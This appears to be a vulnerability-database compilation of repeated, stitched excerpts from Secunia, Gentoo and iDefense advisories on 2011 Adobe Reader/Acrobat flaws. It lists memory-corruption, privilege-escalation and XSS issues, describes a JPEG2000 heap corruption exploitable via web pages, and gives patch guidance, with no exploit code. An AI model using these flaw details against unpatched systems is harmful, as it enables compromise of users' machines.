* Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 4) An unspecified error may allow code execution. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 7) An unspecified error in the Macintosh-based versions may allow code execution. 9) An unspecified error may allow code execution. 10) A input validation error may allow code execution. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 25) An unspecified error when parsing images may allow code execution. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 27) An unspecified error in the Macintosh-based versions may allow code execution. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0021 CVE-2011-0565 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This vulnerability CVE-2011-0585 Is a different vulnerability.An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the affected application to crash. Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting attacks and compromise a user's system. 2) An unspecified error can be exploited to corrupt memory. 3) An unspecified error related to file permissions in Windows-based versions can be exploited to gain escalated privileges. 5) An unspecified error when parsing images can be exploited to corrupt memory. 6) An error in AcroRd32.dll when parsing certain images can be exploited to corrupt memory. 11) An input validation error can be exploited to conduct cross-site scripting attacks. 13) An unspecified error can be exploited to corrupt memory. 14) A boundary error when decoding U3D image data in an IFF file can be exploited to cause a buffer overflow. 15) A boundary error when decoding U3D image data in a RGBA file can be exploited to cause a buffer overflow. 16) A boundary error when decoding U3D image data in a BMP file can be exploited to cause a buffer overflow. 17) A boundary error when decoding U3D image data in a PSD file can be exploited to cause a buffer overflow. 18) An input validation error when parsing fonts may allow code execution. 19) A boundary error when decoding U3D image data in a FLI file can be exploited to cause a buffer overflow. 20) An error in 2d.dll when parsing height and width values of RLE_8 compressed BMP files can be exploited to cause a heap-based buffer overflow. 21) An integer overflow in ACE.dll when parsing certain ICC data can be exploited to cause a buffer overflow. 22) A boundary error in rt3d.dll when parsing bits per pixel and number of colors if 4/8-bit RLE compressed BMP files can be exploited to cause a heap-based buffer overflow. 23) An error in the U3D implementation when handling the Parent Node count can be exploited to cause a buffer overflow. 24) A boundary error when processing JPEG files embedded in a PDF file can be exploited to corrupt heap memory. 26) An input validation error can be exploited to conduct cross-site scripting attacks. 28) A boundary error in rt3d.dll when parsing certain files can be exploited to cause a stack-based buffer overflow. 29) An integer overflow in the U3D implementation when parsing a ILBM texture file can be exploited to cause a buffer overflow. 30) Some vulnerabilities are caused due to vulnerabilities in the bundled version of Adobe Flash Player. For more information: SA43267 The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1 and prior, and 10.0 and prior. SOLUTION: Update to version 8.2.6, 9.4.2, or 10.0.1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: 2) Bing Liu, Fortinet's FortiGuard Labs. 6) Abdullah Ada via ZDI. 8) Haifei Li, Fortinet's FortiGuard Labs. 14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI. 21) Sebastian Apelt via ZDI. 23) el via ZDI. 14) Sean Larsson, iDefense Labs. 28) An anonymous person via ZDI. The vendor also credits: 1) Mitja Kolsek, ACROS Security. 3) Matthew Pun. 4, 5, 18) Tavis Ormandy, Google Security Team. 7) James Quirk. 9) Brett Gervasoni, Sense of Security. 10) Joe Schatz. 11, 26) Billy Rios, Google Security Team. 12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar. 13) CESG. 25) Will Dormann, CERT. 27) Marc Schoenefeld, Red Hat Security Response Team. ORIGINAL ADVISORY: Adobe (APSB11-03) http://www.adobe.com/support/security/bulletins/apsb11-03.html http://www.adobe.com/support/security/bulletins/apsb11-02.html ZDI: http://www.zerodayinitiative.com/advisories/ZDI-11-065/ http://www.zerodayinitiative.com/advisories/ZDI-11-066/ http://www.zerodayinitiative.com/advisories/ZDI-11-067/ http://www.zerodayinitiative.com/advisories/ZDI-11-068/ http://www.zerodayinitiative.com/advisories/ZDI-11-069/ http://www.zerodayinitiative.com/advisories/ZDI-11-070/ http://www.zerodayinitiative.com/advisories/ZDI-11-071/ http://www.zerodayinitiative.com/advisories/ZDI-11-072/ http://www.zerodayinitiative.com/advisories/ZDI-11-073/ http://www.zerodayinitiative.com/advisories/ZDI-11-074/ http://www.zerodayinitiative.com/advisories/ZDI-11-075/ http://www.zerodayinitiative.com/advisories/ZDI-11-077/ FortiGuard Labs: http://www.fortiguard.com/advisory/FGA-2011-06.html iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Adobe Reader: Multiple vulnerabilities Date: January 30, 2012 Bugs: #354211, #382969, #393481 ID: 201201-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Adobe Reader might allow remote attackers to execute arbitrary code or conduct various other attacks. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/acroread < 9.4.7 >= 9.4.7=20 Description =========== Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open a specially crafted PDF file using Adobe Reader, possibly resulting in the remote execution of arbitrary code, a Denial of Service, or other impact. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Reader users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7" References ========== [ 1 ] CVE-2010-4091 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091 [ 2 ] CVE-2011-0562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562 [ 3 ] CVE-2011-0563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563 [ 4 ] CVE-2011-0565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565 [ 5 ] CVE-2011-0566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566 [ 6 ] CVE-2011-0567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567 [ 7 ] CVE-2011-0570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570 [ 8 ] CVE-2011-0585 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585 [ 9 ] CVE-2011-0586 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586 [ 10 ] CVE-2011-0587 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587 [ 11 ] CVE-2011-0588 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588 [ 12 ] CVE-2011-0589 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589 [ 13 ] CVE-2011-0590 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590 [ 14 ] CVE-2011-0591 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591 [ 15 ] CVE-2011-0592 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592 [ 16 ] CVE-2011-0593 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593 [ 17 ] CVE-2011-0594 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594 [ 18 ] CVE-2011-0595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595 [ 19 ] CVE-2011-0596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596 [ 20 ] CVE-2011-0598 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598 [ 21 ] CVE-2011-0599 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599 [ 22 ] CVE-2011-0600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600 [ 23 ] CVE-2011-0602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602 [ 24 ] CVE-2011-0603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603 [ 25 ] CVE-2011-0604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604 [ 26 ] CVE-2011-0605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605 [ 27 ] CVE-2011-0606 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606 [ 28 ] CVE-2011-2130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130 [ 29 ] CVE-2011-2134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134 [ 30 ] CVE-2011-2135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135 [ 31 ] CVE-2011-2136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136 [ 32 ] CVE-2011-2137 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137 [ 33 ] CVE-2011-2138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138 [ 34 ] CVE-2011-2139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139 [ 35 ] CVE-2011-2140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140 [ 36 ] CVE-2011-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414 [ 37 ] CVE-2011-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415 [ 38 ] CVE-2011-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416 [ 39 ] CVE-2011-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417 [ 40 ] CVE-2011-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424 [ 41 ] CVE-2011-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425 [ 42 ] CVE-2011-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431 [ 43 ] CVE-2011-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432 [ 44 ] CVE-2011-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433 [ 45 ] CVE-2011-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434 [ 46 ] CVE-2011-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435 [ 47 ] CVE-2011-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436 [ 48 ] CVE-2011-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437 [ 49 ] CVE-2011-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438 [ 50 ] CVE-2011-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439 [ 51 ] CVE-2011-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440 [ 52 ] CVE-2011-2441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441 [ 53 ] CVE-2011-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442 [ 54 ] CVE-2011-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462 [ 55 ] CVE-2011-4369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201201-19.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201102-0061 CVE-2011-0602 Adobe Reader and Acrobat Vulnerable to arbitrary code execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0596 , CVE-2011-0598 and CVE-2011-0599 Is a different vulnerability.A third party may execute arbitrary code through the image. For more information: SA43207 SOLUTION: Updated packages are available via Red Hat Network. BACKGROUND Adobe Reader/Acrobat is a Portable Document Format Viewer (PDF). For more information, see the vendor's site found at the following link. http://www.adobe.com/products/reader/ II. JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to JPEG markers, JP2K files also provide "boxes" that define different image properties. Several different JP2K record types are involved in the vulnerability. It is possible to increment a buffer index beyond the allocated data, and store pointers to file data at that location. This can result in the corruption of heap structures and application data, which leads to the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page or opening the file. Since PDF files can be embedded into web pages and parsed without interaction by default, this vulnerability can be exploited as a typical browser vulnerability. To exploit this vulnerability, a targeted user must load a malicious webpage created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious web page, no further user interaction is needed. IV. A full list of vulnerable Adobe products can be found in Adobe Security Bulletin APSB11-03. V. WORKAROUND Disabling the web view mode of Adobe Reader will prevent exploitation through the browser. VI. VENDOR RESPONSE Adobe has addressed this issue with an update. Further details and patches can be found at the following URL. http://www.adobe.com/support/security/bulletins/apsb11-03.html VII. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 11/17/2010 Initial Vendor Notification 11/17/2010 Initial Vendor Reply 02/08/2011 Coordinated Public Disclosure IX. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2011 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ---------------------------------------------------------------------- Get a tax break on purchases of Secunia Solutions! If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at: http://secunia.com/products/corporate/vim/section_179/ ---------------------------------------------------------------------- TITLE: Adobe Reader / Acrobat Multiple Vulnerabilities SECUNIA ADVISORY ID: SA43207 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43207/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 RELEASE DATE: 2011-02-09 DISCUSS ADVISORY: http://secunia.com/advisories/43207/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43207/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43207 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Adobe Reader / Acrobat, which can be exploited by malicious, local users to gain escalated privileges and by 